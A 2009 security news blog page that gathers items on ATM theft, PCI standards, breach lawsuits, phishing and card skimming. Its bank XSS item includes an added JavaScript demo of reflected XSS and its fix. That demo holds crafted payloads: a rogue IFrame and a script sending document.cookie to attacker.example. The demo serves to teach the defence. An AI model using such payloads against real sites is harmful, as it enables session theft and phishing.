Friday, May 22, 2009

How To Hack an ATM Part V

Thieves use tractor to try to steal ATM from Gilbert bank

Related videos:
GILBERT, AZ -- Police are investigating an attempted ATM robbery in Gilbert.  It happened just before 5 a.m. Thursday at an M&I Bank near Higley and Queen Creek roads. Police said the would-be robbers tried to make off with the entire machine. Video from the scene shows that they didn't get past the parking lot.

Police said the suspects used a stolen John Deere tractor to bust the ATM loose.

By the time officers arrived on the scene, the thieves were gone. The ATM, however, was on the ground and all of the money was still inside. It's early in the investigation, but at this point police have few leads in the case. They believe the tractor was stolen from Chandler Heights and Higley. Anybody with information about the incident is asked to call the Gilbert Police Department.

PCI SSC Announces New Board of Advisors


May 21, 2009 by ADMIN · 1 Comment
From the PCI Security Standard Council  via Anthony Freed Feed at Information-Security

The PCI Security Standards Council (PCI SSC), an independent industry standards body that manages the Payment Card Industry Data Security Standard (DSS) on a global basis, today announced the results of elections for the PCI SSC Board of Advisors.
The Board of Advisors will represent the current global roster of over 500 PCI SSC Participating Organizations and provide critical feedback to the ongoing enhancement of the security standards managed by the Council.

More than 140 organizations from across the payment industry were nominated for their direct experience and leadership in the field, reflecting the varied perspectives of different global stakeholders. To ensure the desired breadth of industry focus, the elected seats were distributed within the categories of Financial Institutions; Merchants; Processors; Vendors; and Others (industry associations, etc.).

Of those nominated, 14 organizations were elected by their peers in the PCI SSC Participating Organizations member base to serve on the board and provide strategic and technical guidance to the PCI Security Standards Council. To ensure geographic and functional diversity, an additional seven seats were appointed from the Participating Organization roster by the PCI SSC Executive Council to fill any gaps in representation and to help augment any under-represented stakeholder sector or geographic market. As a worldwide organization managing a portfolio of industry standards, the Council seeks input from EMEA, North America, Latin America and Asia Pacific to reflect the global nature of card data security threats.

The new Board of Advisors is comprised of representatives from the following organizations:
  • Bank of America
  • Banrisul S.A.
  • Barclaycard
  • Chase Paymentech Solutions Inc
  • Cisco
  • Citrix Systems, Inc.
  • European Payments Council
  • Exxon Mobil Corporation
  • First Data
  • Global Payments Inc.
  • JPMorgan Chase & Co
  • Lufthansa Systems Passenger Services
  • McDonald’s Corporation
  • MICROS Systems, Inc.
  • National Australia Bank
  • PayPal
  • Royal Bank of Scotland Group
  • Tesco Stores Ltd
  • TSYS Acquiring Solutions
  • VeriFone
  • Wal-Mart Stores, Inc
The inaugural Board of Advisors, which served a two-year term from 2007 to 2009, played an integral part in setting strategic direction for the Council during its formative years. Some of the areas the Board helped guide over this term include the evolution of the PCI Data Security Standard from version 1.1 to 1.2, publication of the Prioritized Approach to PCI DSS and the formation of special interest groups on wireless, scoping, virtualization and pre-authorization. Board representatives will continue to play a leadership role in these groups, working with other industry stakeholders to examine the impact of different technologies and industry-specific challenges on the implementation of PCI Security Standards.

“Our Participating Organizations came out in force in the recent Council nominations and election process. It is exciting to see such widespread participation,” said Bob Russo, general manager, PCI Security Standards Council. “I would like to congratulate not only our new Board of Advisors but everyone who continues to join the Council in pursuing its mission of securing payment card data, through these collaborative processes. I’m confident our new Board of Advisors will build upon the success of their predecessors in helping the Council to effectively evolve the PCI standards and bring new tools and resources to market to help improve education and implementation of PCI standards.”

The first order of business for the new Board of Advisors will be reviewing the results of a Council-commissioned emerging technology study and preparing for the 2009 PCI Security Standards Council Community Meetings in Las Vegas (22-24 September) and Prague, Czech Republic (27-28 October).
For more information about the PCI Security Standards Council or to become a Participating Organization, please visit, or contact the PCI Security Standards Council at

About the PCI Security Standards Council:

The mission of the PCI Security Standards Council is to enhance payment account security by fostering broad adoption of the PCI Data Security Standard and other standards that increase payment data security.
The PCI Security Standards Council was formed by the major payment card brands American Express, Discover Financial Services, JCB, MasterCard Worldwide and Visa Inc. to provide a transparent forum in which all stakeholders can provide input into the ongoing development, enhancement and dissemination of the PCI Data Security Standard (DSS), PIN Entry Device (PED) Security Requirements and the Payment Application Data Security Standard (PA-DSS). Merchants, banks, processors and point of sale vendors are encouraged to join as Participating Organizations.


Hackers Hold Banks "Strictly and Indirectly" Liable

Source: Korea Times
Complete item:

Though it did not catch the attention of many people, something very interesting is happening in the world of Korean Internet transactions. In April 2006 when the Electronic Financial Transaction Act (EFTA) was promulgated, it was at the center of controversy as banks were burdened with the precautions against the wrongdoings of hackers.

Since the contents of the EFTA are focused mostly on who will be held liable (Article 9) if there are any problems while engaged in electronic financial transactions, legislators of the EFTA worked with the presumption that there will be hacker attacks and concentrated mostly on how to protect consumers.

Although supporters of the EFTA argue that financial Internet service providers are in a better position than general participants of the electronic financial transaction, it remains questionable and leaves much room to be rectified at least in the eyes of U.S.-trained lawyers like me. In the traditional jurisprudence of law and equity, is it fair and just to hold the financial Internet service providers (FISPs, mostly banks) strictly liable even without faults to be indirectly liable for any attacks from hackers?

Now since there is a move to amend the EFTA, though it is still not certain yet as to whether the banks will become less burdened after the amendment, I believe it is the right timing to revisit the EFTA almost three years after its debut.

The key issue about the EFTA is that the FISPs, mostly banks, in Korea under the act are ``strictly liable'' by ``vicarious rule'' in Internet  transactions. Of course there are some exceptions in the law for a few minor cases when the banks will be off the hook by proving the contributory negligence by its clients, for example when there is malice or gross negligence by the clients. The whole controversy can be boiled down to two questions:
1. Is it fair and right to hold the FISPs strictly liable for all the wrongdoings of electronic financial transactions?
2. Will the strict vicarious liability for the FISPs by the EFTA detect and prevent all the wrongdoings of electronic financial transactions?

Continue Reading at Korea Times


Heartland Breach Ramifications Thousands Don't Subscribe To

An interesting ramification of the Heartland breach: because banks have "canceled" untold thousands of credit and debit cards and reissued new ones, companies are seeing losses "in the millions of dollars" from automatic billing revenue that is, well...not so automatic anymore.

Automatic Billing which results in monthly subscription revenue has been, and is, being severely impacted.  The Heartland Breach has caused that bird in the hand to fly the coop...and it's safe to say some will litigiously blame the "non"payment processor.  Here's a great story from the Washington Post Blog "Security Fix:"

Heartland Breach Blamed for Failed Membership Renewals - Brian Krebs | Security Fix

In February, Bill Oesterle began seeing nearly twice the normal number of transactions being declined for customers who had set up auto-billing on their accounts. The co-founder of Angie's List -- a service that aggregates consumer reviews of local contractors and physicians -- said he originally assumed more customers were simply having trouble making ends meet in a down economy.

But as that trend continued into March and April, the company shifted its suspicions to another probable culprit: credit card processing giant Heartland Payment Systems.

The data breach last year at Heartland -- a company that processes roughly 100 million card transactions a month for more than 175,000 businesses -- has forced at least 600 banks to re-issue untold thousands of new cards in a bid to stave off fraud.

For consumers, receiving a new credit or debit card number means contacting companies that have those credentials on file to charge for monthly or periodic bill payments. Less well understood, however, is the economic impact that large scale processor breaches and the inevitable waves of re-issues by banks may have on companies when customers simply fail to reset that automatic billing when they receive a new card number.

The Heartland breach happened late in 2008 and was quietly announced in late January. Since then, Oesterle said, Angie's List has seen an increase of two to four percentage points in the rejection of auto-billed payments.

"We estimate that we're seeing an impact of perhaps as much as $1 million in revenue as a result of the increased turnover in card turnover," Oesterle said.

Oesterle said the possibility of the Heartland breach as the source of the increased turnover became clear at a recent staff meeting, when he discovered that three out of four of the people around the table had recently been re-issued new credit cards by their banks, which had attributed the action to the Heartland breach.

"So we started doing some random sampling, and took a look at people [whose cards were] being declined, and started contacting them," Oesterle said. "Most of the people we contacted said they were happy with the service, but had had their credit card re-issued by their bank as a result of the Heartland breach."

The trouble is that convincing customers who had once set up auto-billing to reestablish that relationship after such a disruption is tricky, as many people simply don't respond well to companies phoning or e-mailing them asking for credit card information, Oesterle said.

"We have processes in place to track these rejections that allow us to go back to members, asking for updated information, but we generally accept that some rejected auto-bills will never be recouped," he said. "We'll work hard to re-capture those members, but it will cost us additional resources to do so - and some will be lost."

Avivah Litan, a fraud analyst with Gartner Inc., said no doubt much of the attrition companies like Angie's List are seeing is in fact due to cards being re-issued by banks in response to the Heartland breach. But she said Heartland is likely also being wrongly blamed as the source of cards compromised in other -- less publicized -- data breaches that happened at the same time.

Continue Reading at Security Fix


Fugheddaboudit Says MS to EU on Hearing

Microsoft won't bother with EU hearing
Microsoft wanted the European Commission to reschedule a hearing at which Redmond would be able to defend itself against the EU's conclusion that tying IE to Windows is anticompetitive. The reason: Microsoft's top antitrust staff would be attending a big conference in Zurich. The EU declined. Microsoft's response: Just forget it.


Hannaford Lawsuits Dismissed...You Didn't Lose Money Says Judge

Dismissing Hannaford Lawsuits, Federal Judge Tells Consumers: Show Me The (Lost) Money

Written by Evan Schuman and Fred J. Aun
May 13th, 2009

U.S. District Court Judge D. Brock Hornby on Tuesday (May 12) became the latest jurist to rule in favor of data-breached retailers, telling Hannaford consumers that because they were compensated by their banks, they have no basis to sue civilly here.

“There is no way to value and recompense the time and effort that consumers spent in reconstituting their bill-paying arrangements or talking to bank representatives to explain what charges were fraudulent. Those are the ordinary frustrations and inconveniences that everyone confronts in daily life with or without fraud or negligence.”

The class-action-lawsuit-wannabe stems from last year’s data breach at the grocery chain, which exposed 4.2 million credit and debit cards and led to 1,800 reported cases of fraud. Similar to rulings in cases involving fellow data-breach retail victim TJX, Hornby said he couldn’t allow almost any of the defendants to continue with the case because the consumers hadn’t suffered out-of-pocket financial losses.

In an ironic sense, this all stems from the card brands’ zero liability programs. Those programs guarantee that consumers will have all fraud losses wiped clean. (The one defendant who can continue is a consumer whose fraud loss costs ”for reasons unknown” were not covered by her bank.)

In his decision (full text copy available), Hornby rejected all but one of the claims brought by 21 plaintiffs against the Maine-based operator of more than 200 stores in New England, New York and Florida.

Continue Reading at


X86 Virtualization Should Be Virtually 86'd - IBM

IBM security expert: X86 virtualization not ready for regulated, mission-critical apps
Created May 22 2009 - 11:32am

In a session on virtualization held at Interop Las Vegas this week, IBM security expert Joshua Corman argued that X86 virtualization is not ready for highly regulated, mission-critical applications. The problem is that virtualization opens up new attack surfaces and presents additional operational and availability risks.

In addition, advanced features such as live migration of virtual machines increase the complexity. Besides the possibility of man-in-the-middle attacks that intercept a VM's memory and disk state when it is migrated over an unencrypted channel, another pertinent question to ask is whether a virtual machine has been moved to a less secure host.

Indeed, virtualization makes it harder to meet regulatory requirements such as PCI DSS. Corman, who is the principal security strategist for IBM's Internet Security Systems division, said, "If you have a choice, I highly recommend you don't adopt virtualization for any regulated project. If you're going to make mistakes, it's better to do so on less critical systems."
Ironically, though, Corman noted how an obsession with compliance leads people to give up on risk management. He does offer some advice for organizations working with virtualization. For one, only Type 1 (bare-metal) hypervisors should be used for production applications. Also, production applications should be separated from those used for testing or development.

For more on this story:

- See the full article at Network World.


RSA (EMC) Unveils New InfoSec Products to Protect PII

RSA, the security division of EMC, has announced a comprehensive suite that is expected to help organisations comply with the US Data Breach Notification Laws for protecting personally identifiable information (PII) and mitigate the risk of security breaches.

RSA is announcing three distinct packages of information security products, covering two-factor authentication, security information and event management (SIEM) and data loss prevention (DLP), designed to meet the needs of mid-sized companies.

RSA says SecurID helps prevent data breaches by ensuring that both business data and private customer data are available only to authorized users.

Continue Reading at CBR security


RSA Pledges to Tackle Credit Card Fraud

RSA pledges to tackle credit card fraud
Insurance firm offers package to help businesses. Insurance provider RSA (the RSA Insurance Group, not the EMC security division in the item above) has launched a package of materials aimed at helping retailers tackle credit card fraud.

Credit card theft and cloning have been heavily in the news of late, with rising incidences and new security technologies both recently reported.  RSA has now launched a series of tools - including workshops and self-assessment questionnaires - which retailers can use to ensure they adhere to the Payment Card Industry's Data Security Standard, which is a series of measures aimed at tackling fraud.

"Retailers currently face a great deal of challenges with fragile sales and regular and frequent changes to legislation," said Des Cross, RSA retail director.  "The threat of security attacks on their computer systems leading to the abuse of customer data is yet another growing worry for them and could prove costly to their reputation.  "We have created a package to help businesses keep all of these worries under control."  Some of the more novel approaches to tackling credit card fraud revealed lately have included a card with its own keypad and a card that can tell which country its owner is in.

US Bank and BofA Websites Vulnerable to XSS

Banking / Finance Alerts
Source: Softpedia
Complete item:

Cross-site scripting weaknesses have been discovered in two websites belonging to the Bank of America and U.S. Bank. The flaws facilitate potential phishing attacks, because they allow attackers to inject IFrames, hijack sessions, or prompt arbitrary alerts.

Cross-site scripting, more commonly known as XSS, is a class of vulnerabilities typically affecting web applications, which lets an attacker inject arbitrary script into pages served by the site. They result from a failure to encode untrusted input (URL parameters, form fields, headers) for the HTML context in which it is reflected back to the browser.

The flaws discovered in the websites of U.S. Bank and Bank of America are non-persistent (reflected) XSS weaknesses, the most widespread type in the class. The injected code is carried in the request itself, typically as a manipulated URL parameter, and is echoed in that one response; it is not stored by the site, so it runs only for victims who open the crafted URL.

Even if the actual risk posed by these weaknesses is lower than that of persistent XSS flaws, they are still dangerous for various reasons. For example, such malformed URLs can be used in complex phishing campaigns, significantly raising their credibility. This is because users are, obviously, more likely to visit unsolicited links pointing to domains they trust.

The latest vulnerabilities have been reported and documented by a grey-hat hacker calling himself Methodman, who is a member of Team Elite, a group of programmers and security enthusiasts. In his proof-of-concept (PoC) attacks, he outlines how attackers can sniff session cookies (the small values a website sets in the browser and that the browser sends back with each request to keep the user logged in). Injected script can read them via document.cookie unless the cookie carries the HttpOnly flag.

However, even if Methodman limited his PoCs to session hijacking attacks, this is not the only unauthorized action cybercrooks can perform through these flaws. As demonstrated by the screenshots we took ourselves, IFrame injection is also possible. IFrame is an HTML element, which allows loading externally hosted content into a web page.

IFrames are heavily used in most web-based attacks, because they can be entirely hidden. Hidden IFrames are generally used by malware distributors to load malicious JavaScript code in the background. However, styles can be applied to them fairly easily, which is a great advantage for phishers. For example, such an IFrame could be used to inject a rogue form, which asks for the visitor's financial details, and be made to look like part of the legitimate page.

At the time of posting this article, the XSS weaknesses on the U.S. Bank and Bank of America websites remained active.
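As an added example (not code from the Softpedia article, from Team Elite's PoCs, or from either bank's site), here is the pattern behind a reflected XSS flaw and its fix, written as a small Node.js rendering function. The page markup, the `q` parameter name, the hostnames and both payloads are constructed for illustration. The vulnerable version echoes the query parameter into the HTML response unencoded, so a crafted URL injects a phishing IFrame or a cookie-stealing script; the hardened version HTML-encodes the value for the text context it lands in. A session cookie with HttpOnly is shown alongside because it blunts the cookie-sniffing PoC even where an XSS bug remains.

```javascript
// Added example: reflected XSS, vulnerable vs. hardened rendering.
// Hostnames, parameter name and payloads are constructed for illustration.

// Encode the five characters that break out of an HTML text or attribute context.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Minimal page template; `reflected` lands inside an HTML text node.
function pageTemplate(reflected) {
  return '<html><body><h1>Search results</h1>' +
         '<p>You searched for: ' + reflected + '</p></body></html>';
}

// VULNERABLE: the query parameter is concatenated into the response as-is,
// which is the defect class the article describes (non-persistent/reflected XSS).
function renderSearchPageVulnerable(q) {
  return pageTemplate(q);
}

// HARDENED: the same value is HTML-encoded before it is reflected, so the
// browser renders "<iframe ...>" as literal text instead of as markup.
function renderSearchPageSafe(q) {
  return pageTemplate(htmlEscape(q));
}

// Extract a parameter from a crafted URL the way the server would see it
// (percent-decoding happens here, so the payload arrives as raw markup).
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) || '';
}

// Crude check used by the demo below: does the response carry markup that
// executes or loads remote content? Not a real filter; do not use it as a defence.
function containsActiveMarkup(html) {
  return /<\s*(script|iframe|img\b[^>]*onerror)/i.test(html);
}

// Session cookie header with HttpOnly: document.cookie can no longer read it,
// so the cookie-sniffing PoC fails even if an XSS bug remains. Secure keeps it
// off plaintext HTTP. Neither flag fixes the XSS itself.
function sessionCookieHeader(sessionId) {
  return 'SESSIONID=' + sessionId + '; Path=/; Secure; HttpOnly; SameSite=Lax';
}

// Demo with two constructed payloads: a rogue login IFrame (phishing) and a
// cookie exfiltration script (session hijacking). Returns, per payload, whether
// the vulnerable and the hardened responses still contain active markup.
function demo() {
  const iframeUrl = 'https://bank.example/search?q=' +
    encodeURIComponent('<iframe src="https://attacker.example/login"></iframe>');
  const cookieUrl = 'https://bank.example/search?q=' +
    encodeURIComponent('<script>new Image().src="https://attacker.example/c?"+document.cookie</script>');
  const results = {};
  for (const [label, url] of Object.entries({ iframe: iframeUrl, cookie: cookieUrl })) {
    const q = queryParam(url, 'q');
    results[label] = {
      vulnerableExecutes: containsActiveMarkup(renderSearchPageVulnerable(q)),
      hardenedExecutes: containsActiveMarkup(renderSearchPageSafe(q)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node` and both payloads show `vulnerableExecutes: true, hardenedExecutes: false`. The fix is context-specific encoding at the point of output, not input filtering: the same value reflected into a JavaScript string or an attribute without quotes would need a different encoder, which is why a templating engine that escapes by default is the practical answer.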



MasterCard Losing $30 Billion of Debit Portfolio to Visa

Source: Bloomberg
Complete Item:
MasterCard Inc., the world’s second-largest electronic payments network, will lose more than half of a $59 billion portfolio of U.S. debit-card users after JPMorgan Chase & Co. decided to shift more business to Visa Inc., "two people" familiar with the matter said.

MasterCard held the portfolio since 2005, said "the people", who declined to be identified because the switch hasn’t been officially announced. The customers had checking accounts at Seattle-based Washington Mutual Inc. until JPMorgan bought assets of the failed lender last year, the people said. Bidding for the accounts began in October, "the people" said.

“We recognize that given the highly competitive nature of our industry and the challenging environment facing our financial institution customers today, decisions such as these can occur,” said Joanne Trout, a spokeswoman for Purchase, New York-based MasterCard. The move won’t have a material impact on MasterCard’s revenue, Trout said. (priceless?)

The shift strengthens Visa’s hold on debit cards as consumers use them for a bigger share of their purchases, including staples such as gasoline and food. Visa already controls about two-thirds of the U.S. debit market, according to the Nilson Report, an industry newsletter. Issuers are counting on more debit card use to make up for declining credit-card profit as the 8.9 percent U.S. jobless rate drives up defaults.

Continue Reading


Twitter Cloned at Tvviter: Be Aware!

Security experts warn on malicious tweets
Complete Item:

Twitter users! Be warned that you could be the target of the latest phishing campaign, which tries to persuade micro-bloggers into revealing their login details. Security researchers at Sophos warn that messages are being circulated that point Twitter users towards a website called 'tvviter' (with two 'v's rather than a 'w'). (I wouldn't recommend you visit.) People who make the mistake of clicking on the link will be taken to a bogus (cloned) website which is pretending to be Twitter.

“It hopes to fool people into handing over their username and password,” Sophos said on one of its official blogs, which it reckons could lead ultimately to some painful identity fraud, as well as an account being used for the purposes of spam or spreading malware.

Editor's Note: There are those ever-present usernames and passwords causing problems again, and yet another cloned website. When Twitter gets serious about TwitPay, I hope these whispers are heard as shouts and they use secure 2FA (not username and password).


4 in L.A. Charged in $400k Citibank ATM Skim Scam

4 Charged in San Fernando Valley "Skim" Scam after milking $400k from a Citibank ATM
Source: KTLA News
Complete Item:,0,6322452.story

LOS ANGELES - Four San Fernando Valley men are charged in an alleged electronic crime scheme in which more than two dozen victims lost more than $400,000 via phony ATM withdrawals.  Oganes Tangabakyan, 31, and Edgar Yerkanyan, 25, both of Sherman Oaks, Aznaour Poghosyan, 26, of Tujunga; and Vahe Hovsepyan, 33, of Reseda, are scheduled to be arraigned May 28 at the downtown Los Angeles courthouse on the 57-count complaint.

The investigators also seized several late-model, high-end automobiles and more than $200,000 in cash -- most of it in $20 bills, officials said.

The District Attorney's Bureau of Investigation began investigating the case last August after being informed by Citibank of possible ATM fraud, according to the District Attorney's Office.

The defendants allegedly gained access to ATM personal identification numbers through skimming devices placed on debit card point-of-sale terminals and ATMs in Southern California and at least one other state.

Bail was set at $1 million each for the four men, who were arrested


ATM Skimming Epidemic Hits Australia

In an article written for Australian PC Authority, Daniel Long talks about the recent rash of card skimming incidents over there. 
Credit card fraud costs Australia $120m, but there are ways to protect yourself

Card skimming and online fraudsters are costing Australians over $120m a year, but there is hope say experts. We've got some tips on how to navigate your local ATM and what to look out for.

According to a new white paper by information security specialist Steve Darrall of CQR Consulting, Australia is experiencing something of a credit card fraud epidemic.
In recent months, ATMs have been blown sky high, card skimming devices have grown increasingly prevalent in our suburbs, and credit card fraud, online and offline, is at an all-time high.
The white paper claims that card skimming alone cost Australians more than $49m in 2008. In all, total credit fraud made up around $120m from two main groups:

- Counterfeit cards and card skimming ($49m)
- Card not present fraud (CNP) concerns your mail, telephone, fax and internet transactions. ($71m) 

Two banking security initiatives have been offered by CQR as a better way of protecting against credit card frauds and they hope that the wider adoption of these measures can help the banks/card companies better protect consumers:

1. Payment Card Industry Data Security Standard (PCI-DSS):
Developed by the major credit card brands, this standard applies to all organizations that store, process or transmit cardholder payment data, regardless of size or transaction numbers.

2. Payment Application Data Security Standard (PA-DSS).
This standard applies to software applications designed to store, process or transmit payment card information.

Mr Darrall believes that what's holding back the mass adoption of these standards are costs and mindset of the merchants. Darrall told PC Authority that while the banks are very interested in adopting these standards, merchants have not been so crash hot about the idea. Furthermore, this isn't an area for complacency. Even with the introduction of more advanced chip and PIN cards, "this isn't the magic bullet" we might be hoping for, but a step in the right direction says Mr Darrall.

The card skimming problem

Even with the growth of online fraud and banking phishing schemes, physical card skimming is a growing problem. Physical card skimming uses a reader fitted over the ATM's card slot to copy the magnetic stripe as the card is inserted, paired with a pinhole camera or a false keypad overlay to capture the PIN, and it can be much harder for customers to detect.

Skimming is getting so high tech that some gangs are resorting to using Bluetooth and fake keyboards to 'catch' your PIN when you enter it, so holding your hand over the keyboard will make little difference in this
But according to Mr Darrall, there are techniques you can use to minimize your risk.  (Continue Reading)

